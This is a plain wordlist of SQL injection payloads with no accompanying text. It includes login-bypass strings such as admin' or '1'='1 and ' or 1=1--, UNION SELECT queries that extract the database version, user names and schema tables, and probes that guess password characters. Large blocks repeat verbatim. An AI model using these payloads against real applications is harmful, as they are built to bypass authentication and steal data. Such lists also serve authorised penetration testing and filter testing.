'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
' –
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
 or 1=1
 or true
' or ''='
" or ""="
1′) and '1′='1–
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 and 1=1
 and 1=1–
' and 'one'='one
' and 'one'='one–
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
 like '%'
 or 0=0 --
 or 0=0 #
 or 0=0 –
' or         0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0 –
" or 0=0 --
" or 0=0 #
" or 0=0 –
%' or '0'='0
 or 1=1
 or 1=1--
 or 1=1/*
 or 1=1#
 or 1=1–
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1–
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1′
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1–
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1′='1–
) or ('1′='1–
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a–
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one–
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'
' or 1=1 --
' or 'a'='a
" or "a"="a
' or 1=1 --
" or 1=1 --
or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 #
' or 'x'='x
" or "x"="x
') or 'x'='x
") or "x"="x
' or 1--
" or 1--
' or 'a'='b
" or "a"="b
') or ('a'='b
") or ("a"="b
" or 1=1/*
' or 1=1/*
or 1=1/*
' or username like '%
" or username like "%
or username like %
' or username like 'a%
" or username like "a%
or username like a%
' or password like '%
" or password like "%
or password like %
' or password like 'a%
" or password like "a%
or password like a%
' or 1=(select count(*) from users)
" or 1=(select count(*) from users)
or 1=(select count(*) from users)
' or 1=(select count(*) from users where username='admin')
" or 1=(select count(*) from users where username="admin")
or 1=(select count(*) from users where username=admin)
' or 1=(select count(*) from users where password='password')
" or 1=(select count(*) from users where password="password")
or 1=(select count(*) from users where password=password)
' or username=' or 'x'='x
" or username=" or "x"="x
or username= or x=x
' or password=' or 'x'='x
" or password=" or "x"="x
or password= or x=x
' or username='admin' --
" or username="admin" --
or username=admin --
' or password='password' --
" or password="password" --
or password=password --
' or username='admin' #
" or username="admin" #
or username=admin #
' or password='password' #
" or password="password" #
or password=password #
' or username='a' or 'b'='b
" or username="a" or "b"="b
or username=a or b=b
' or password='a' or 'b'='b
" or password="a" or "b"="b
or password=a or b=b
' or 1=(select count(*) from users where username like '%')
" or 1=(select count(*) from users where username like "%")
' OR 1=1--
' OR 'a'='a
' OR '1'='1
' OR 'x'='x
' OR username='admin
' OR username='root
' OR username='administrator
' OR password='password
' OR 1=1 --
' OR 'a'='a
" OR "a"="a
' OR 1=1 -- a
" OR 1=1 -- a
' OR 'a'='a' --
" OR "a"="a" --
' OR 'a'='a' /*
" OR "a"="a" /*
admin' --
admin' #
admin'/*
admin' OR '1'='1
' OR 1=1 LIMIT 1 --
" OR 1=1 LIMIT 1 --
' OR 'a'='a' LIMIT 1 --
" OR "a"="a" LIMIT 1 --
' OR 'a'='a' LIMIT 1 /*
" OR "a"="a" LIMIT 1 /*
OR 1=1 --
OR 'a'='a
OR 1=1 #
OR 'a'='a' #
OR 1=1 /*
OR 'a'='a' /*
OR 1=1 LIMIT 1 --
OR 'a'='a' LIMIT 1 --
OR 1=1 LIMIT 1 /*
OR 'a'='a' LIMIT 1 /*
' OR '1'='1
" OR "1"="1
' OR 1=1 -- a
" OR 1=1 -- a
' OR 'a'='a' --
" OR "a"="a" --
' OR 'a'='a' /*
" OR "a"="a" /*
' OR 1=1 LIMIT 1 --
" OR 1=1 LIMIT 1 --
' OR 'a'='a' LIMIT 1 --
" OR "a"="a" LIMIT 1 --
' OR 'a'='a' LIMIT 1 /*
" OR "a"="a" LIMIT 1 /*
OR 1=1 --
OR 'a'='a
OR 1=1 #
OR 'a'='a' #
OR 1=1 /*
OR 'a'='a' /*
OR 1=1 LIMIT 1 --
OR 'a'='a' LIMIT 1 --
OR 1=1 LIMIT 1 /*
OR 'a'='a' LIMIT 1 /*
' OR 1=1 -- a
" OR 1=1 -- a
' OR 'a'='a' --
" OR "a"="a" --
' OR 'a'='a' /*
" OR "a"="a" /*
' OR 1=1 LIMIT 1 --
" OR 1=1 LIMIT 1 --
' OR 'a'='a' LIMIT 1 --
" OR "a"="a" LIMIT 1 --
' OR 'a'='a' LIMIT 1 /*
" OR "a"="a" LIMIT 1 /*
OR 1=1 --
OR 'a'='a
OR 1=1